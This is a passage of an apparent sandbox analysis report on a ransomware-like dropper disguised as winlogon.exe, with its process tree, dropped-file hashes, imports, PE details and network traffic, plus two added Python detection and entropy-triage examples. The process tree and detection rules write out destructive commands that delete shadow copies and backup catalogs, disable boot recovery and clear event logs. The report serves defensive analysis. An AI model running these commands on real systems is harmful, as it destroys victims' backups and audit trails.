        • vssadmin.exe (PID: 3372 cmdline: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet MD5: 6E248A3D528EDE43994457CF417BD665)
      • cmd.exe (PID: 3404 cmdline: C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wbadmin.exe (PID: 3428 cmdline: wbadmin.exe delete catalog -quiet MD5: EAB630E7E6A7FC248870A2FCDC098B98)
      • cmd.exe (PID: 3668 cmdline: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no MD5: AD7B9C14083B52BC532FBA5948342B98)
        • bcdedit.exe (PID: 3692 cmdline: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures MD5: ABD373E82F6240031C1E631AA20711C7)
        • bcdedit.exe (PID: 3700 cmdline: bcdedit /set {default} recoveryenabled no MD5: ABD373E82F6240031C1E631AA20711C7)
      • cmd.exe (PID: 3708 cmdline: C:\Windows\system32\cmd.exe /c wevtutil.exe cl System MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 3732 cmdline: wevtutil.exe cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)
      • cmd.exe (PID: 3748 cmdline: C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 3772 cmdline: wevtutil.exe cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)
  • wbengine.exe (PID: 3464 cmdline: C:\Windows\system32\wbengine.exe MD5: 691E3285E53DCA558E1A84667F13E15A)
  • vdsldr.exe (PID: 3496 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: A2551668C78CEA4089D71A0A3B36FC0C)
  • vds.exe (PID: 3524 cmdline: C:\Windows\System32\vds.exe MD5: C3CD30495687C2A2F66A65CA6FD89BE9)
  • LogonUI.exe (PID: 3840 cmdline: 'LogonUI.exe' /flags:0x0 MD5: 3EF0D8AB08385AAB5802E773511A2E6A)
  • LogonUI.exe (PID: 3928 cmdline: unknown MD5: 3EF0D8AB08385AAB5802E773511A2E6A)
  • cleanup
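
The Startup tree above records, under _usm.exe, the complete recovery-inhibition sequence (vssadmin delete shadows, wbadmin delete catalog, bcdedit recoveryenabled no / bootstatuspolicy ignoreallfailures, wevtutil cl System and Security) and, under winlogon.exe, two helpers launched with a \\.\pipe\{GUID} argument through which they report back to the parent. The following is an added detection example, not part of the sandbox report and not the sample's code: it scores process-creation records for exactly these patterns. The records are constructed from the PIDs and command lines in the tree; the rule list, the launcher set and the severity rule are assumptions made for this example.

```python
"""Score process-creation records for the recovery-inhibition, log-clearing and
named-pipe hand-off command lines recorded in the Startup tree.

Added example, not part of the sandbox report and not the sample's code. The
record shape (pid, ppid, image, cmdline) is a simplified stand-in for a Sysmon
Event ID 1 or Security 4688 event; the rule list, the launcher set and the
severity rule are assumptions made for this example."""
import re
from collections import defaultdict
from typing import Dict, List, Set

# (tag, pattern) pairs; patterns are applied to the lower-cased command line.
RULES = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows")),
    ("backup_catalog_deletion", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog")),
    ("boot_recovery_disabled", re.compile(
        r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+"
        r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("event_log_cleared", re.compile(r"wevtutil(\.exe)?\s+cl\s+\w+")),
    # child handed a \\.\pipe\{GUID} on its command line, as yegus.exe and ucngw.exe were
    ("named_pipe_handoff", re.compile(
        r"\\\\\.\\pipe\\[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}")),
]
RECOVERY_TAGS = {"shadow_copy_deletion", "backup_catalog_deletion",
                 "boot_recovery_disabled", "event_log_cleared"}
LAUNCHERS = {"cmd.exe", "powershell.exe"}   # assumption: treated as pass-through shells


def match_rules(cmdline: str) -> List[str]:
    text = cmdline.lower()
    return [tag for tag, rx in RULES if rx.search(text)]


def origin(pid: int, procs: Dict[int, dict]) -> int:
    """Nearest ancestor of `pid` that is not a pass-through shell, so that
    'cmd.exe /c vssadmin ...' is credited to whoever started cmd.exe."""
    cur = procs[pid]["ppid"] if pid in procs else pid
    visited: Set[int] = set()
    while cur in procs and procs[cur]["image"].lower() in LAUNCHERS and cur not in visited:
        visited.add(cur)
        cur = procs[cur]["ppid"]
    return cur


def analyse(records: List[dict]) -> Dict[int, dict]:
    """Map originating pid -> {image, tags, severity}."""
    procs = {r["pid"]: r for r in records}
    hits: Dict[int, Set[str]] = defaultdict(set)
    for r in records:
        tags = match_rules(r["cmdline"])
        if tags:
            hits[origin(r["pid"], procs)].update(tags)
    result = {}
    for pid, tags in hits.items():
        image = procs[pid]["image"] if pid in procs else "<unknown>"
        # two or more distinct recovery-inhibition actions from one origin is the ransomware pattern
        severity = "critical" if len(tags & RECOVERY_TAGS) >= 2 else "medium"
        result[pid] = {"image": image, "tags": sorted(tags), "severity": severity}
    return result


# Constructed from the Startup tree of the report (PIDs and command lines as listed there).
SAMPLE_RECORDS = [
    {"pid": 3216, "ppid": 0, "image": "winlogon.exe", "cmdline": r"'C:\Users\user\Desktop\winlogon.exe'"},
    {"pid": 3232, "ppid": 3216, "image": "yegus.exe", "cmdline": r"123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464"},
    {"pid": 3280, "ppid": 3216, "image": "ucngw.exe", "cmdline": r"123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B"},
    {"pid": 3296, "ppid": 3216, "image": "_usm.exe", "cmdline": r"C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe"},
    {"pid": 3336, "ppid": 3296, "image": "cmd.exe", "cmdline": r"C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet"},
    {"pid": 3372, "ppid": 3336, "image": "vssadmin.exe", "cmdline": r"c:\Windows\system32\vssadmin.exe delete shadows /all /quiet"},
    {"pid": 3404, "ppid": 3296, "image": "cmd.exe", "cmdline": r"C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet"},
    {"pid": 3428, "ppid": 3404, "image": "wbadmin.exe", "cmdline": r"wbadmin.exe delete catalog -quiet"},
    {"pid": 3668, "ppid": 3296, "image": "cmd.exe", "cmdline": r"C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"},
    {"pid": 3692, "ppid": 3668, "image": "bcdedit.exe", "cmdline": r"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 3700, "ppid": 3668, "image": "bcdedit.exe", "cmdline": r"bcdedit /set {default} recoveryenabled no"},
    {"pid": 3708, "ppid": 3296, "image": "cmd.exe", "cmdline": r"C:\Windows\system32\cmd.exe /c wevtutil.exe cl System"},
    {"pid": 3732, "ppid": 3708, "image": "wevtutil.exe", "cmdline": r"wevtutil.exe cl System"},
    {"pid": 3748, "ppid": 3296, "image": "cmd.exe", "cmdline": r"C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security"},
    {"pid": 3772, "ppid": 3748, "image": "wevtutil.exe", "cmdline": r"wevtutil.exe cl Security"},
]

if __name__ == "__main__":
    for pid, info in sorted(analyse(SAMPLE_RECORDS).items()):
        print(pid, info["image"], info["severity"], ", ".join(info["tags"]))
```

Attribution walks up through cmd.exe so the four commands are credited to _usm.exe, the process that issued them, instead of to four unrelated cmd.exe instances that each look harmless on their own; a Sysmon Event ID 1 or Security 4688 feed that carries the parent process id maps onto the same three fields.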

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):36864
Entropy (8bit):5.891300526858096
Encrypted:false
MD5:3C0D740347B0362331C882C2DEE96DBF
SHA1:8350E06F52E5C660BB416B03EDB6A5DDC50C3A59
SHA-256:AE9A4E244A9B3C77D489DEE8AEAF35A7C3BA31B210E76D81EF2E91790F052C85
SHA-512:A701F94B9CDEBCE6EFF2F82552EC7554BF10D99019F8BCD6871EBCA804D7519BDCFA3806AC7C7D8E604C3259C61C58B905293FA641C092A8FCA8245F91EB0F8F
Malicious:true
Antivirus:
  • Antivirus: virustotal, Detection: 60%, Browse
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):339096
Entropy (8bit):6.384232735880303
Encrypted:false
MD5:27304B246C7D5B4E149124D5F93C5B01
SHA1:E50D9E3BD91908E13A26B3E23EDEAF577FB3A095
SHA-256:3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF
SHA-512:BEC172A2F92A95796199CFC83F544A78685B52A94061CE0FFB46B265070EE0BCC018C4F548F56018BF3FF1E74952811B2AFB6DF79AB8D09F1EC73C9477AF636B
Malicious:false
Antivirus:
  • Antivirus: virustotal, Detection: 0%, Browse
  • Antivirus: metadefender, Detection: 3%, Browse
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):3723264
Entropy (8bit):7.9213131085726545
Encrypted:false
MD5:56E50AD3D0746E4A4B1458506DACF2E7
SHA1:0B818B27FD4C1656F43B288C29C510F0BABF939A
SHA-256:131BA113ED14E999275B0CC7C932277EF7CA944888F928EE8DB50333420CA3BC
SHA-512:69FE8FC3039C5503D15C8AE77E9B4D4DFA457D2DBF52289B6A5FBB83278713EA3AF63246F64E74B021BE6A7C67E2089702FC97F3EFD4C349CFEB5C44CA57BC04
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe:Zone.Identifier
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
Entropy (8bit):3.9500637564362093
Encrypted:false
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Reputation:high, very likely benign file
C:\Users\HERBBL~1\AppData\Local\Temp\chr9AAC.tmp
File Type:SQLite 3.x database
Size (bytes):18432
Entropy (8bit):0.8481809040173017
Encrypted:false
MD5:727EB3BA54F16CB4C7C19AB1101B8802
SHA1:8702933960447F3FB8423E9F9F8FEF2C23D6B7AB
SHA-256:255F5314D835CBDC33B46216B083C3FA4DD7F61B27F48B539B41341EF0911423
SHA-512:FB079623312587E70AE2263FFCC9C12C492332CE6D048A85DD1B32C15535A6CF8E9D67AE146D01862B1C50B297EED0A07042AC19A4FC8838E534BCFEBFC77BE2
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):231424
Entropy (8bit):7.52549984722154
Encrypted:false
MD5:6E0EBEEEA1CB00192B074B288A4F9CFE
SHA1:21CA710ED3BC536BD5394F0BFF6D6140809156CF
SHA-256:A52AF66A4438C5517870C503AC1E0515AF44D3994AA62C7D818B6EEF46CFBB2D
SHA-512:BBB24AAC7EF5B5E8CF8934666D02C1E51980DB3C4703FEC1F240BAE35E1C8517E19736D8F2E27A9ED77D8A6881C2C3A5A3653E66425E7058B2985063FC38949C
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):769536
Entropy (8bit):7.930796192224973
Encrypted:false
MD5:4F43F03783F9789F804DCF9B9474FA6D
SHA1:492D4A4A74099074E26B5DFFD0D15434009CCFD9
SHA-256:19AB44A1343DB19741B0E0B06BACCE55990B6C8F789815DAAF3476E0CC30EBEA
SHA-512:645C2F0A1342732B86A45403FB8B1343BCC18C015C9918D2EDF118BBB210FEAD98AA21F1B66AC5FAABD0542583D74E158FBAC6D5F0D49827F4EEB58C8EBAFD6D
Malicious:false
Reputation:low
\122B85FE-84BD-45AB-AEE5-28D37FB4C464
File Type:data
Size (bytes):12
Entropy (8bit):2.125814583693911
Encrypted:false
MD5:177C7293D42D1C9C48678AB79D034F1E
SHA1:C828BAEF11CC61FC91D29D00AB980FBBA9A3BD42
SHA-256:7E1246792C8DFE9E1F254115344159F0A800EBD273F678E7036F10FCAC0CD377
SHA-512:DF3A4FCBDB220FDD26301A5B4DF68A15CB6DE5D748C86E1E340268D3F7C0384323E7A792DFBE8BADB1523339994CFFFEE1E94D7C64557DD47546C466B559D557
Malicious:false
\33F83B68-FC3D-4C1F-B4AE-1329770D367B
File Type:empty
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection
252.0.0.224.in-addr.arpa | unknown | unknown | true | 0%, virustotal

Note: 252.0.0.224.in-addr.arpa is the reverse-lookup (PTR) name for 224.0.0.252, the IPv4 LLMNR multicast address (RFC 4795), so the repeated PTR queries in the DNS Queries table are reverse lookups of that multicast address, not resolution of an attacker-registered domain. Read the "Tries to resolve many domain names, but no domain seems valid" signature with that in mind; the TCP/135 connection attempts in the Network Behavior section are the more telling network activity.

Contacted IPs

IP | Country | ASN | ASN Name | Malicious
192.168.2.238 | unknown | unknown | unknown | false
192.168.2.240 | unknown | unknown | unknown | false
192.168.2.250 | unknown | unknown | unknown | false
192.168.2.252 | unknown | unknown | unknown | false
192.168.2.244 | unknown | unknown | unknown | false
8.8.8.8 | United States | 15169 | GOOGLE-GoogleIncUS | false
192.168.2.254 | unknown | unknown | unknown | false
192.168.2.242 | unknown | unknown | unknown | false
192.168.2.248 | unknown | unknown | unknown | false
192.168.2.246 | unknown | unknown | unknown | false

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.9213131085726545
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:winlogon.exe
File size:1861632
MD5:cfdd16225e67471f5ef54cab9b3a5558
SHA1:26de43cc558a4e0e60eddd4dc9321bcb5a0a181c
SHA256:edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9
SHA512:e1855a872f4db7c17eb22130d9cb205eddde641f1b39ea5de97dfb762fc97dc2347bc6e6e88b9c5a303e1540b4b4bdb19c839c7d3e237348adbfa4b942f24adb
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;E..hE..hE..h.._hO..h..]h...h..\h]..h.6ihD..h~..iQ..h~..ii..h~..iV..hL.-hF..hL.=hP..hE..h...h...iV..h..QhD..hE.9hD..h...iD..

File Icon

Static PE Info

General

Entrypoint:0x40ae66
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5A4387AF [Wed Dec 27 11:44:47 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:975087e9286238a80895b195efb3968d

Entrypoint Preview

The code at the entry point is the standard MSVC CRT start-up, not sample-specific logic: a call to the CRT's security-cookie initialiser followed by a jump to the common start-up routine, then the stub that hands the exception record to SetUnhandledExceptionFilter/UnhandledExceptionFilter and terminates the process with status 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN), and the start of the GS-failure report routine, which tests IsProcessorFeaturePresent(0x17) and executes int 29h (fast-fail, code 2) when the processor supports it, otherwise saving the register state for the crash record. The sample's own behaviour lives in the code functions listed in the signature entries above (for example 1_2_00D634B0, the named-pipe server, and 1_2_00D65970, the GetVersionExW caller); those 0x00D6xxxx addresses are the image relocated by ASLR away from the 0x400000 image base, consistent with the DYNAMIC_BASE flag listed above.

Instruction
call 00007FC5206B76CFh
jmp 00007FC5206B70D3h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041F188h]
push dword ptr [ebp+08h]
call dword ptr [0041F184h]
push C0000409h
call dword ptr [0041F124h]
push eax
call dword ptr [0041F114h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007FC5206C98A3h
test eax, eax
je 00007FC5206B7247h
push 00000002h
pop ecx
int 29h
mov dword ptr [00430CC8h], eax
mov dword ptr [00430CC4h], ecx
mov dword ptr [00430CC0h], edx
mov dword ptr [00430CBCh], ebx
mov dword ptr [00430CB8h], esi
mov dword ptr [00430CB4h], edi
mov word ptr [00430CE0h], ss
mov word ptr [00430CD4h], cs
mov word ptr [00430CB0h], ds
mov word ptr [00430CACh], es
mov word ptr [00430CA8h], fs
mov word ptr [00430CA4h], gs
pushfd
pop dword ptr [00430CD8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00430CCCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00430CD0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00430CDCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00430C18h], 00010001h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26df4 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x33000 | 0x195b88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c9000 | 0x1644 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x25df0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x25e28 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1f000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1d4ac | 0x1d600 | False | 0.573720079787 | data | 6.65423641734 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x1f000 | 0x8bac | 0x8c00 | False | 0.497879464286 | data | 5.462837397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x28000 | 0x96fc | 0x8c00 | False | 0.0412109375 | data | 0.885300140538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids | 0x32000 | 0x134 | 0x200 | False | 0.3984375 | data | 2.38182890346 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x33000 | 0x195b88 | 0x195c00 | False | 1.00009145872 | data | 7.99984549743 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1c9000 | 0x1644 | 0x1800 | False | 0.766927083333 | data | 6.4041746291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
BIN | 0x33170 | 0xbbe00 | data | English | United States
BIN | 0xeef70 | 0x38800 | data | English | United States
BIN | 0x127770 | 0x45600 | data | English | United States
BIN | 0x16cd70 | 0x52c98 | data | English | United States
BIN | 0x1bfa08 | 0x9000 | data | English | United States
RT_MANIFEST | 0x1c8a08 | 0x17d | XML 1.0 document text | English | United States
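
The .rsrc section above has 8-bit entropy 7.9998 and a ZLIB complexity of about 1.0 over 0x195c00 bytes, roughly 89% of the 1,861,632-byte file, and holds five BIN resources typed as plain data rather than as executables. Together with the FindResourceW, LoadResource, LockResource and SizeofResource imports listed below, that is the usual layout of a dropper that keeps packed or encrypted payloads in its resources and extracts them at run time. The following added example, not part of the sandbox report, shows the entropy sweep behind that triage: it locates high-entropy regions in a byte buffer and reports whether a carved region starts with a plain MZ header. The buffer is constructed (a seeded pseudo-random blob between runs of zero bytes) so that the example runs offline; the window size, step and threshold are assumptions.

```python
"""Locate packed or encrypted (high-entropy) regions in a byte buffer, the
sweep behind reading the .rsrc entropy and BIN resource sizes in the tables above.

Added example, not part of the sandbox report. SAMPLE is a constructed buffer
(a seeded pseudo-random blob between runs of zero bytes) so that this runs
offline; feed real section or resource bytes to find_high_entropy_regions to
use it. Window, step and threshold are assumptions chosen for the example."""
import math
import random
from collections import Counter
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def find_high_entropy_regions(data: bytes, window: int = 1024, step: int = 512,
                              threshold: float = 7.2) -> List[Tuple[int, int]]:
    """Slide a window across `data` and merge overlapping windows whose entropy
    reaches `threshold` into (start, end) byte ranges. Compressed or encrypted
    payloads score close to 8.0; code and text usually stay well below 7."""
    regions: List[Tuple[int, int]] = []
    for start in range(0, max(len(data) - window, 0) + 1, step):
        chunk = data[start:start + window]
        if shannon_entropy(chunk) < threshold:
            continue
        end = start + len(chunk)
        if regions and start <= regions[-1][1]:
            regions[-1] = (regions[-1][0], end)      # extend the current region
        else:
            regions.append((start, end))
    return regions


def describe_region(data: bytes, region: Tuple[int, int]) -> Dict[str, object]:
    """Carve a region and report whether it is a plain embedded PE (MZ header)
    or still encoded, which separates 'dropper stores raw PEs in resources'
    from 'dropper decrypts resources before writing them to disk'."""
    blob = data[region[0]:region[1]]
    return {"offset": region[0], "size": len(blob),
            "entropy": round(shannon_entropy(blob), 3),
            "raw_pe": blob[:2] == b"MZ"}


# Constructed input: 8 KiB of zeros, 16 KiB of seeded pseudo-random bytes, 8 KiB of zeros.
_rng = random.Random(1234)
SAMPLE = bytes(8192) + bytes(_rng.randrange(256) for _ in range(16384)) + bytes(8192)

if __name__ == "__main__":
    for region in find_high_entropy_regions(SAMPLE):
        print(describe_region(SAMPLE, region))
```

On the real file the same sweep over the .rsrc bytes (or over each BIN resource individually) tells you whether the five blobs are raw PE files, which the report's "data" type and near-8.0 entropy argue against, or need the loader's decryption routine before they can be compared against the hashes of _usm.exe, yegus.exe and ucngw.exe in the dropped-files list.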

Imports

DLL | Imports
KERNEL32.dll | GetVersionExW, GetModuleHandleA, CreateEventW, MultiByteToWideChar, Sleep, GetTempPathA, CopyFileA, GetLastError, GetFileAttributesA, CreateFileA, SetEvent, TerminateThread, DeleteFileW, CloseHandle, LoadLibraryW, CreateThread, GetOverlappedResult, VirtualProtectEx, GetWindowsDirectoryW, GetProcAddress, VirtualAllocEx, LocalFree, GetFileSize, DeleteCriticalSection, ExitProcess, GetCurrentProcessId, CreateProcessW, GetModuleHandleW, CreateRemoteThread, CreateProcessA, CreateEventA, ConnectNamedPipe, GetComputerNameA, GetFileAttributesW, HeapFree, HeapAlloc, GetProcessHeap, GetTempPathW, GetTickCount, SizeofResource, LockResource, LoadResource, FindResourceW, FindFirstFileExW, CreateFileW, LocalAlloc, WaitForSingleObject, InitializeCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, CreateNamedPipeW, GetModuleFileNameW, TerminateProcess, InterlockedDecrement, WriteFile, ReadFile, GetCurrentProcess, GetCommandLineW, EnterCriticalSection, WriteProcessMemory, CancelIo, FindClose, DecodePointer, SetEndOfFile, HeapSize, WriteConsoleW, FlushFileBuffers, GetStringTypeW, SetStdHandle, ReadConsoleW, SetFilePointerEx, GetModuleFileNameA, FreeLibrary, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, GetOEMCP, IsValidCodePage, LCMapStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, WideCharToMultiByte, EncodePointer, RaiseException, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, GetStdHandle, GetModuleHandleExW, GetACP, HeapReAlloc, GetConsoleCP, GetConsoleMode, GetFileType, FindNextFileW
USER32.dll | wsprintfW
ADVAPI32.dll | CryptAcquireContextW, CryptReleaseContext, LookupPrivilegeValueW, AdjustTokenPrivileges, CryptGenRandom, LookupPrivilegeNameW, CopySid, IsValidSid, LogonUserA, OpenProcessToken, ConvertSidToStringSidW, GetLengthSid, LookupAccountSidW, GetTokenInformation
SHELL32.dll | SHGetSpecialFolderPathW, CommandLineToArgvW
ole32.dll | CoCreateGuid, CoTaskMemFree, CoSetProxyBlanket, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize
OLEAUT32.dll | SysFreeString, SysAllocString, SysStringLen, SafeArrayUnaccessData, SafeArrayAccessData, VariantClear, SafeArrayCreate
IPHLPAPI.DLL | GetIpNetTable
WS2_32.dll | FreeAddrInfoW, GetAddrInfoW, WSACleanup, WSAStartup, ntohl
credui.dll | CredUIParseUserNameW
NETAPI32.dll | NetApiBufferFree, NetGetDCName

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 12, 2018 21:38:30.860141993 CET | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.880199909 CET | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.880276918 CET | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:30.905082941 CET | 51075 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.905164003 CET | 53 | 51075 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:30.927845955 CET | 63053 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.927926064 CET | 53 | 63053 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:30.995573997 CET | 65490 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:30.995654106 CET | 53 | 65490 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.002337933 CET | 65311 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.002427101 CET | 53 | 65311 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.012367010 CET | 59195 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.012440920 CET | 53 | 59195 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.036601067 CET | 65034 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.036674976 CET | 53 | 65034 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.050959110 CET | 56352 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.051029921 CET | 53 | 56352 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.059361935 CET | 51492 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:31.059423923 CET | 53 | 51492 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:31.765642881 CET | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:32.179327011 CET | 65236 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:32.311522007 CET | 53 | 65236 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:32.616265059 CET | 57178 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:32.753743887 CET | 53 | 57178 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:33.061160088 CET | 49408 | 53 | 192.168.2.2 | 8.8.8.8
Feb 12, 2018 21:38:33.179438114 CET | 53 | 49408 | 8.8.8.8 | 192.168.2.2
Feb 12, 2018 21:38:33.513441086 CET | 57291 | 53 | 192.168.2.2 | 8.8.8.8
